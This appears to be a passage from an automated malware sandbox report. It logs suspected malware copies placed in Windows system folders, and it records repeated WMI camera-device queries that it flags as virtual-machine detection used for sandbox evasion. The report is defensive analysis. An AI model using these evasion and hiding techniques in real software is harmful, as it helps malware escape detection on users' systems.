Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
